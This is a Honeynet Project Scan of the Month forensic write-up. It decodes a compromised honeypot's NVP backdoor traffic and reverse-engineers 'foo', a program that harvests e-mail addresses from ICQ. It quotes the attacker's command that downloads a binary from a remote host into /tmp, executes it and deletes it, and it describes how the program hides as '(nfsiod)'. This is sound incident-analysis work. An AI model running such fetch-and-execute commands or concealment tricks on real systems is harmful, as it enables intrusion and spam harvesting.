Honeynet Project Scan of the Month - Scan 22 (August 2002)
Submission by Eloy Paris <peloy at chapus dot net>
Thu Aug 22 19:00:17 EDT 2002
To Chapu and he/she that is coming
1. Summary
The Honeynet Project's Scan of the Month for August requires the analysis of network traffic from/to a compromised host on which a backdoor program was installed by the perpetrator. We will see how the attacker uses this backdoor to instruct the compromised honeypot to execute several commands. One particular command downloads an executable from another host that seems to be under control of the attacker, and then executes it. The provided Snort log (a file that contains captured network traffic) suggests that the executable launches a Denial of Service (DoS) attack against a specific site (web.icq.com.) However, after reverse-engineering the downloaded file I conclude that the attacker is pursuing a completely different objective.
2. Analysis
In this section I discuss the steps that I followed to analyze the Snort network trace that was provided.
The first thing I notice after looking at the provided network capture (running "tcpdump -r snort-0718@1401") is that there is Network Voice Protocol (NVP) traffic. NVP is an IP protocol, with a protocol number of 11.
This sounds really familiar: the Honeynet Project's Reverse Challenge, which took place in May of this year, required reverse-engineering a program that was left running on a compromised honeypot.
After reverse-engineering this program[1] it was determined that its purpose was to act as a backdoor that would give the person that compromised the honeypot the following capabilities:
Now, the novel thing about the backdoor was that all communications between the backdoor and its handler were done via IP protocol 11 (NVP), which doesn't seem to be currently in use. Also, the IP data (which is used to tell the backdoor what commands to execute, what DoS to launch, victim IP addresses, etc.) was codified with a simple algorithm, so unless the appropriate decoder is used it is not possible to make any sense of the data by just looking at it.
Knowing that the network traces contained IP protocol 11 traffic I analyzed the problem from the point of view of communications between the backdoor reverse-engineered during the Reverse Challenge and its handler.
With this in mind I wrote a small C program, dump.c[2], that processes the Snort log and prints out the commands sent to the backdoor as well as its responses. I ran this program on the provided Snort log and used the program output in the first step of my analysis. The program output is too large to be included here, but I am including it in Appendix A.
By looking at the output we can clearly see what the attacker is doing:
11:09:13.557615 94.0.146.98 > 172.16.183.2: ip-proto-11 402
Initialize communication parameters. The backdoor is configured to send all its responses to the IP address 203.173.144.50.
11:10:34.876658 192.146.201.172 > 172.16.183.2: ip-proto-11 402
Request that the backdoor executes the command "grep -i "zone" /etc/named.conf" and send back the results.
11:10:35.005093 172.16.183.2 > 203.173.144.50: ip-proto-11 512
The following result is sent back:
zone "." { zone "0.0.127.in-addr.arpa" {
11:10:35.495194 172.16.183.2 > 203.173.144.50: ip-proto-11 463
Final part of the command requested in packet #8. It's just an empty string.
15:35:00.285126 168.148.27.14 > 172.16.183.2: ip-proto-11 402 15:35:56.667243 10.39.81.89 > 172.16.183.2: ip-proto-11 402
The handler requests (twice) that the backdoor executes the command "killall -9 ttserve". This suggests that the attacker had run in the past a program called "ttserve" and wanted to make sure it was not running at this time.
15:57:37.983480 58.248.76.90 > 172.16.183.2: ip-proto-11 402
This is perhaps the most important command since I will be focusing on its effects for the remainder of this paper. The attacker requests that the backdoor executes the following command (without sending back the output):
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
The important commands here are "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve" and "./ttserve". Well analyze these later on.
16:02:40.043361 218.209.145.27 > 172.16.183.2: ip-proto-11 402 16:03:37.492985 122.255.17.55 > 172.16.183.2: ip-proto-11 402 16:04:33.707291 26.44.146.84 > 172.16.183.2: ip-proto-11 402
Request (three times) the execution of the command "killall -9 lynx ; rm -rf /tmp/ttserve;"
Now that I have identified the commands the attacker has sent to the backdoor I can use standard tools to study the rest of the network traffic that was captured. Using Ethereal or tcpdump I can see the following traffic patterns (see note below about the IP 11.11.11.11 shown in the following packets):
15:57:39.114395 172.16.183.2.1025 > 11.11.11.11.8882: S 240028091:240028091(0) win 32120(DF)
The 3-way handshake for the HTTP download from 216.242.103.2:8882 starts. The download starts two packets later (packet #76.)
The download ends:
15:57:52.376036 11.11.11.11.8882 > 172.16.183.2.1025: R 215579:215579(0) ack 546 win 31856(DF)
15:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413: udp 3
An UDP packet from the compromised honeypot to 216.242.103.2 port 53413.
Note: This is a "preview". There's no way of knowing at this point that the UDP packet goes to 216.242.103.2. Here we see that it goes to 11.11.11.11. I know it doesn't go to 11.11.11.11 but to 216.242.103.2 because I reverse-engineered "foo". See the next note below.
15:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025: udp 10
216.242.103.2 responds with another UDP packet.
216.242.103.2 seems to be under the control of the attacker too (compromised.) If this is the case, the reason why the attacker didn't use 216.242.103.2 instead of the honeypot for his/her evil doings eludes me.
The HTTP downloads from web.icq.com might lead me to think that what "foo" is doing is just a DoS on web.icq.com. We shall see if this is true...
Note: There is something weird here: I know that the HTTP download that starts in packet #73 is for a file from 216.242.103.2:8882. However, the Snort log shows 216.242.103.2 as 11.11.11.11. Some possible explanations for this include:
The IP header checksum is invalid (we can see this with tcpdump or ethereal) and I know this is not possible because the honeypot is running Linux, and the Linux kernel always calculates the IP header checksum, even if sending packets via raw sockets (see the raw(7) manual page.) Furthermore, an IP packet with an invalid checksum would have been dropped (read RFC-791)
To confirm this theory I picked one packet and calculated manually the IP header checksum but using the IP address I believe was originally there (which was obtained through the reverse-engineering process.) The result matched the checksum present in the Snort log. This means that the IP header originally did not have 11.11.11.11 as the address in the source or destination fields of the IP header.
So, I strongly believe the Snort log has been tampered with, but this is not important since I will reverse engineer "foo". What is important is to note that whenever we see 11.11.11.11 in the Snort log (as shown above) that's not the real IP address the packet is coming from/going to.
2.3 "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve"
As I mentioned in the previous section, in packet #72 the attacker requests that the backdoor execute several commands. One of these commands just downloads using HTTP a file called 'foo' from a specific HTTP server (at IP address 216.242.103.2, TCP port 8882.) The command saves "foo" as "/tmp/ttserve" and then executes it.
Since I know that running "ttserve" generates HTTP traffic against web.icq.com, it is absolutely necessary to get a hold of this file so it can be analyzed.
As we shall see, if the Honeynet Project had given us a little bit more of network capture, I would not have needed to get a hold of "foo" and study it. However, seeing what happens after packet #5085 would make this Scan of the Month too easy :-)
There are several ways of reconstructing "foo" from the Snort log file. Some of these are: 1) Use Ethereal to reconstruct the HTTP conversation, save the conversation to disk (it will be saved as a text file) and then a write a small script that processes the file and generates the binary (we can also do something similar with tcpdump or even Snort in tcpdump file reading mode.) 2) Write a custom program that processes the Snort log file directly and generates the binary. Any language that has an interface to libpcap (C and Perl, for example) will make things easier. 3) Take advantage of a tool that someone already wrote, like Jeremy Elson's tcpflow.
In this case I just used tcpflow, which is perhaps the easiest way because there is no need to write any code:
peloy@canaima:/tmp$ tcpflow -r snort-0718%401401.log peloy@canaima:/tmp$ vi 011.011.011.011.08882-172.016.183.002.01025 peloy@canaima:/tmp$ mv 011.011.011.011.08882-172.016.183.002.01025 foo
tcpflow generates several files but I chose the one that starts with "011.011.011.011" because that's the one that contains the HTTP download (remember that the port used was 8882, which is embedded in the file name above.)
I edited the file (as shown above) to remove the header returned by the HTTP server. (By the way, recovering binary files from Snort logs has been covered extensively in previous Scans of the Month.)
Now that I have "foo", a.k.a. "ttserve", the fun can begin.
As I mentioned at the end of section 2.2, the HTTP traffic between the compromised honeypot and web.icq.com might lead us to think that the sole purpose in life of "foo" is to execute a DoS attack against web.icq.com. In fact, the Snort log shows how "foo" needs to retry the downloads several times, or that three-way handshakes fail, or that TCP connections are RST, all of which suggest that web.icq.com might be flooded with HTTP requests and that the "DoS attack" is being successful. However, the only way of determining the purpose of "foo" for sure is by reverse-engineering it.
I reverse-engineered "foo" and came up with an equivalent C program, foo.c, which is easier to understand. With the source code for "foo" we can now understand exactly what "foo" does, and what the attacker was trying to do. "foo" has the following characteristics:
The most difficult part of reverse-engineering a binary like "foo" that is statically-linked is reconstructing the symbol table, and figure out the calls to functions in the C library. When I disassembled the-binary for the Reverse Challenge I used a very cumbersome process to reconstruct the symbol table. Fortunately, the winner of the Challenge, Dion Mendel, developed some fantastic tools that make reconstructing a symbol table a children's game. So, for this reverse-engineering task I used his tools, which can be downloaded from http://www.honeynet.org/reverse/results/sol/sol-06/.
Once the symbol table is reconstructed all you need is a little bit of patience and some knowledge of assembly language, C, network programming, and how a C compiler generates assembly language for some C constructs, like variable allocation, "if" statements, "for", "do ... while()" and "while ()" loops. Plain old paper and pencil help too. Basically, one starts with the assembly language listing and reconstructs the equivalent C program.
For more information on reverse-engineering a binary I recommend you read some of the top 20 submissions for the Reverse Engineer Challenge. They are worth reading.
The features of "foo" will be explained in detail in Question 4.
3. Answers
Question 1. What is the attacker's IP address?
The attacker initializes the backdoor running on the hacked honeypot in packet #7. The initialization (command code 2 - see packet-format.txt) tells the backdoor to send its responses to one particular IP address as well as to 9 other randomly generated IP addresses (response mode 1), although there is a bug in the backdoor and only 8 random IPs are used (in addition to the real IP sent by the attacker.)
The initialization command used in packet #7 configures the backdoor to respond to the IP address 203.173.144.50. However, I don't know for sure if this is the IP address of the machine being used by the attacker since he/she could be sniffing traffic going to that machine or network. The attacker could be in the same IP network as 203.173.144.50, or sniffing in a segment that traffic going to 203.173.144.50 must cross.
I cannot infer anything from the source IPs in the packets that control the backdoor since these IPs are spoofed, i.e. they are random IPs.
203.173.144.50 resolves to p50-tnt7.syd.ihug.com.au. The web page at www.ihug.com.au tells us that IHUG is an Internet Service Provider in Australia. "whois 203.173.144.50" confirms that the IP address to which the backdoor will send its responses is in a block assigned to IHUG.
The FQDN of the machine also gives information about the physical location where the attacker might be located: Sydney, Australia.
The Snort log that was provided during the Reverse Challenge (so participants could test their network traffic decoders) shows that the attacker programmed the backdoor to respond to the IP 203.173.144.35 (p35-tnt7.syd.ihug.com.au). This IP is in the same network, which suggests that the attacker is connecting to the Internet via dial-up because he/she gets a different IP with each new connection. If this ISP keeps connection logs for its users, and given that we know the exact time the attacker was messing around with the compromised host, it would be easy to further track the attacker (account that was used during the attacks, phone number the attacker dialed in from, etc.)
Question 2. What is the attacker doing first? What do you think is his/her motivation for doing this?
There are three things the attacker does before starting what I consider the attacker's main activity:
Another additional motivation might be to find out if the honeypot was going to cache DNS requests during an attack (be it a DoS or just a sweep of web pages to harvest e-mail addresses) initiated from the compromised honeypot. If DNS requests are cached there is less network activity that can reveal that something is going on.
The presence of /etc/named.conf does not imply that named is running, though.
Question 3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?
Actually, all the packets this question refers to have readable text (including packets #15 and #16.) I assume this is just a minor mistake. The readable text is towards the end of the packets and looks like (but is a bit different in each packet):
0x01b0 207b 0a7a 6f6e 6520 2230 2e30 2e31 3237 .{.zone."0.0.127 0x01c0 2e69 6e2d 6164 6472 2e61 7270 6122 207b .in-addr.arpa".{ 0x01d0 0a00 636f 6e66 2220 313e 202f 746d 702f ..conf".1>./tmp/ 0x01e0 2e68 6a32 3337 3334 3920 323e 2631 0098 .hj237349.2>&1
I believe the packets the Honeynet Project is referring to as containing readable text are part of two batches: the first batch contains packets #9 to #17, and the second contains packets #18, #20, #21, #22, #24, #25, #26, #27, and #28. Note that each batch has exactly 9 packets.
All the packets in these two batches are responses sent by the backdoor running on the compromised honeypot to the IP address specified in the initialization command (see Question 1) plus 8 random IPs, and contain the output of the command that the attacker instructed the backdoor to execute with packet #8.
The first batch contains the actual output from the command:
zone "." { zone "0.0.127.in-addr.arpa" {
The second batch just contains an empty string, and is there to signal the end of the command output. Think of it like a C string: a C string is a sequence of characters that ends with a null byte. Well, the only way the attacker has of knowing there is no more output coming from the backdoor is by receiving a last packet with an empty string.
The reason why some packets have readable text is because of a mistake done by the author of the-binary: if you look at my de-compilation of the-binary you'll see that the backdoor encodes for sending 400 bytes (see line 245 of the-binary.c), but then sends (in line 246) 400 bytes plus an additional random number (between 0 and 201) of bytes:
70 char *bufptr, buffer[400]; [...] 232 bufptr = buffer; 233 do { 234 bytes_read = fread(ippacket, 1, 398, output_file); 235 ippacket[bytes_read] = '\0'; 236 for (i = 0; i <= 397; i++) 237 decoded[i + 2] = ippacket[i]; [...] 245 encode(400, decodedptr, bufptr); 246 send_response(ips_ptr, bufptr, 247 (rand() % 201) + 400); 248 usleep(400000); 249 } while (bytes_read != 0);
There are between 0 and 201 bytes the backdoor is not encoding, and these bytes represent the readable text we see in the network packets this question refers to: bufptr points to a buffer of 400 bytes located in the stack (declared in line 70), and since we are telling send_response() to send between 400 and 601 bytes, most of the time send_response() will read past the end of the buffer pointed to by bufptr, which is a part of the stack that happens to have text that is not encoded. The solution to this problem would be to make the buffer bigger (601 bytes) and encode the exact number of bytes we are sending.
As you can see, knowledge about the internals of the-binary really help to understand what we are seeing on the wire.
By the way, I mentioned in question #1 above that the attacker configured the backdoor to send responses to 1 specific IP and to 9 random IPs, but that because of a bug in the backdoor only 8 random IPs are used. This is what we are seeing here: packets #17 to #25 are the output of the command 'grep -i "zone" /etc/named.conf', sent to 9 IPs instead of 10 because of the bug.
Question 4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?
Just by looking quickly at the decompiled "foo" (foo.c) we can infer that the purpose of "foo" is to harvest electronic mail addresses from web.icq.com via HTTP, and once a certain number has been collected, send them via UDP to a particular host on the Net.
I must confess that I was fooled by the Snort log when I first tried to guess the purpose of "foo". The reason is that the only thing I saw in the network trace were HTTP connections (lots of them) from the compromised honeypot to web.icq.com, and this led me to believe that "foo" was performing a DoS attack against this host. So, it wasn't until I finished reverse-engineering "foo" that I realized what "foo" was really doing.
"foo" works in the following way:
The communication between "foo" and its master follows a very simple protocol:
GET /wwp?Uin=x GET /wwp?Uin=x+1 GET /wwp?Uin=x+2 [...]
where x is the number that was received in the "GU" command, and the delay between GETs is hard-coded at 25 seconds.
"foo" will harvest e-mail addresses from these web pages. It will do so by parsing the downloaded web page for the string "mailto:" and saving the text that follows, i.e. an e-mail address.
"SEx\nuser1@domain1\nuser2@domain2\n ...user100@domain100\n"
(the x after "SE" is the Uin that was received in the "GU" command.)
Appendix B contains a sample communication session where the protocol can be seen at work.
As we can see, if the Honeynet Project had included a few more packets from their Snort log we would have seen "foo" sending some e-mail addresses to 216.242.103.2 UDP port 53413, and reverse-engineering "foo" would not have been necessary. I can only assume this was done on purpose, to make the Scan of the Month more interesting :-)
Regarding the skills of the author of "foo", I would say that the author is neither a beginner nor an advanced programmer (perhaps closer to "advanced" than to "beginner") The program is well structured (good use of subroutines), the communication protocol between "foo" and its handler is very simple but works well and is well implemented. Error handling seems to be done well and and the application-level reliability (because of the lack of reliability in UDP) is also implemented (and implemented well.)
I saw many stupid things (and even bugs) when I decompiled the-binary from the Reverse Challenge, and the facts (build environment, programming style) lead me to conclude that it was the same programmer who wrote both the-binary and foo. However, "foo" looks a bit better and doesn't have the mistakes made in the-binary. But this might be just because the program is much simpler.
The code in foo.c's harvest_email_addresses() function, especially the code that parses an HTML page looking for "mailto:" URIs is a bit hairy, with excessive use of if's and else's, though. This could be simplified.
I'd say that "foo" was written by someone that is getting good at programming.
Question 5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?
"./ttserve" just executes the program "foo", which was downloaded from http://216.242.103.2:8882/foo and saved as /tmp/ttserve (see section 2.3.) Running "ttserve" will start the e-mail harvesting process I explained in Question 4.
As we saw in the previous question, one of the first things that ttserve (a.k.a. "foo") does when it runs is to fork. The parent process exits but the child stays running doing its evil business. This means that control returns to the shell and the command "rm -rf /tmp/ttserve" is executed while "ttserve" is still running. /tmp/ttserve is removed by the attacker to get rid of the evidence. Now that the program is running there is not need to have the executable laying around anymore.
Remember also that "ttserve" concealed its program name as "(nfsiod)" so it could not be noticed by a valid user of the honeypot through the "ps" command. This is an extra measure to prevent detection of the activities performed by the attacker.
Finally, since './ttserve ; rm -rf /tmp/ttserve' is not executed through an interactive shell, there is no .history or .bash_history file that can be used to determine what commands the attacker executed.
Question 6. How do you think the attacker will use the results of his activity involving 'foo'?
As we saw, foo is a tool that harvests electronic mail addresses from web.icq.com. In these days when e-mail spamming has become one of the worst plagues of the 21st century (an e-plague), it is fairly obvious what the attacker can do with thousands of e-mail addresses collected automatically by a little program in very little time. Ways in which the attacker could use the results of his activity involving "foo" include:
I find #1 the most possible use of the e-mail addresses.
Bonus Question. If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it?
I just administer a home network, and my border router is configured to block most traffic except some traffic that I explicitly allow for services I use. For example, I allow HTTP traffic to go through.
The border router is also configured to log all blocked traffic to an internal syslog server, so I would probably have noticed the NVP traffic by looking at the syslog:
Aug 12 19:33:57 gw 7455: Aug 12 23:33:57: %SEC-6-IPACCESSLOGNP: list 111 denied 11 ww.xxx.yy.zzz -> aa.bb.ccc.ddd, 1 packet
(the 11 after "denied" means "IP protocol 11")
The above syslog entry was generated when the border router blocked an incoming IP packet that had the IP protocol field set to 11 (NVP.)
Obviously, I would only have noticed the NVP packet, but I would not have obtained the real packet unless I was also capturing network.
An Intrusion Detection System (IDS) like Snort would be the best way to detect the NVP backdoor because we could add signatures that would trigger an alert on the presence of IP protocol 11 traffic, and we could also have the IDS save the suspicious traffic to a disk file for later analysis. The Reverse Challenge (see question 4) asked a similar question to this one.
What would have been hard to notice is the sweep of web pages from web.icq.com that "foo" performs to harvest e-mail addresses. It is hard because it is legitimate traffic that is not logged anywhere, that is small, and that has a very slow rate (happens every 25 seconds.)
Summarizing:
4. Files
This section contains links to all the files referenced in this paper as well as a short summary of the purpose of the file.
5. Thanks
Appendix A - NVP Backdoor Commands
In this appendix I include the output of dump.c after passing it the Snort log provided for this Scan of the Month. The log is a network trace that has 5085 packets. Here I am only including the packets that are related to communications between the backdoor running on the compromised honeypot and the handler.
Please note that in the Snort log there is more NVP (IP protocol 11) traffic than what I am showing here (specifically, there are 16 packets not shown below.) The reason why I didn't include these 16 packets is because they are not relevant: remember that in packet 7 the NVP backdoor was initialized to send responses to 1 particular IP address plus 9 random addresses (of which only 8 are used due to a bug.) I am not including here the responses sent to random IPs. These responses account for the missing 16 packets.
peloy@canaima:/tmp$ dump -f snort-0718%401401.log [...] -------------------------------------------------- Packet 7, 11:09:13.557615 Length of IP data: 402 bytes 94.0.146.98 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 2 (Initialize communication parameters) Response mode: 1 (To 1 specific IP address and 9 random IP addresses) Respond to: 203.173.144.50 -------------------------------------------------- Packet 8, 11:10:34.876658 Length of IP data: 402 bytes 192.146.201.172 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 3 (Execute command, send back results) Command to execute: grep -i "zone" /etc/named.conf -------------------------------------------------- Packet 12, 11:10:35.005093 Length of IP data: 512 bytes 172.16.183.2 -> 203.173.144.50 Length of IP data: 512 IP protocol is NVP Direction: From backdoor Command output: 'zone "." { zone "0.0.127.in-addr.arpa" { ' -------------------------------------------------- Packet 22, 11:10:35.495194 Length of IP data: 463 bytes 172.16.183.2 -> 203.173.144.50 Length of IP data: 463 IP protocol is NVP Direction: From backdoor Command output: '' -------------------------------------------------- Packet 62, 15:35:00.285126 Length of IP data: 402 bytes 168.148.27.14 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 7 (Execute remote command, don't send back results) Command to execute: killall -9 ttserve -------------------------------------------------- Packet 63, 15:35:56.667243 Length of IP data: 402 bytes 10.39.81.89 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 7 (Execute remote command, don't send back results) Command to execute: killall -9 ttserve -------------------------------------------------- Packet 72, 15:57:37.983480 Length of IP data: 402 bytes 58.248.76.90 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 7 (Execute remote command, don't send back results) Command to execute: killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ; -------------------------------------------------- Packet 1236, 16:02:40.043361 Length of IP data: 402 bytes 218.209.145.27 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 7 (Execute remote command, don't send back results) Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve; -------------------------------------------------- Packet 1237, 16:03:37.492985 Length of IP data: 402 bytes 122.255.17.55 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 7 (Execute remote command, don't send back results) Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve; -------------------------------------------------- Packet 1282, 16:04:33.707291 Length of IP data: 402 bytes 26.44.146.84 -> 172.16.183.2 Length of IP data: 402 IP protocol is NVP Direction: To backdoor Command: 7 (Execute remote command, don't send back results) Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve; --------------------------------------------------
Now that I have studied foo.c there's little doubt regarding what's the evil purpose of "foo". However, it always pays to do a little bit of testing, so I made a couple of minor changes to foo.c and recreated a test environment.
First, I wrote a small Perl script that simulates the /wwp script found at web.icq.com. The script is passed a parameter called Uin via a HTTP GET request. When the script is run it just generates a short HTML document that simulates a user's home page, and includes a "mailto:" URI.
Next I edited foo.c and changed all references to "web.icq.com/wwp" to "localhost/cgi-bin/wwp" so when "foo" starts sweeping web pages it does so in my local Apache server, and not the remote web.icq.com. I also replaced all references to 216.242.103.2 with localhost, so when "foo" tries to contact the handler to get instructions it contacts my local machine.
Finally, I ran "foo" and netcat on the local machine. I started netcat with parameters to listen for connections on local UDP port 53413, which is what "foo" is programmed to do. I was then able to control foo by sending it manual commands.
The following is a sample testing session:
peloy@canaima:/tmp$ vi foo.c # s/web.icq.com/localhost/, etc. peloy@canaima:/tmp$ gcc -Wall -o foo foo.c # compile my foo.c peloy@canaima:/tmp$ ps aux | grep nfs # see if foo is running peloy@canaima:/tmp$ ./foo # run foo peloy@canaima:/tmp$ ps aux | grep nfs # see if it is running now peloy 7362 0.0 0.0 1316 500 ? S 19:45 0:00 (nfsiod) peloy@canaima:/tmp$ nc -l -u -p 53413 -vv # netcat: listen on UDP port 53413 listening on [any] 53413 ... connect to [127.0.0.1] from localhost [127.0.0.1] 33508 GU <- foo sends the "Get Uin" command GU <- I didn't respond so foo resends DU1073 -> I respond SE1073 <- A few seconds later foo sends the e-mails it's 1073@whatever.com * harvested 1074@whatever.com * 1075@whatever.com * 1076@whatever.com * 1077@whatever.com * 1078@whatever.com * 1079@whatever.com * 1080@whatever.com * 1081@whatever.com * 1082@whatever.com * 1083@whatever.com * 1084@whatever.com * GOT -> I respond saying "I got the addresses" GU <- foo asks for the next Uin DIE -> I tell him it is time to die sent 15, rcvd 233 peloy@canaima:/tmp$ ps aux | grep nfs # confirm that foo died peloy@canaima:/tmp$ # it did :)
Footnotes
[1] I reverse-engineered the-binary from the Reverse Challenge. However, I could not finish in time so I didn't make a submission. My work with the-binary definitely helped me to understand some of the most important points of this Scan of the Month.
[2] The dump.c program that allows to decode NVP backdoor traffic was written specifically for the Scan of the Month 22, not during my work on the Reverse Challenge.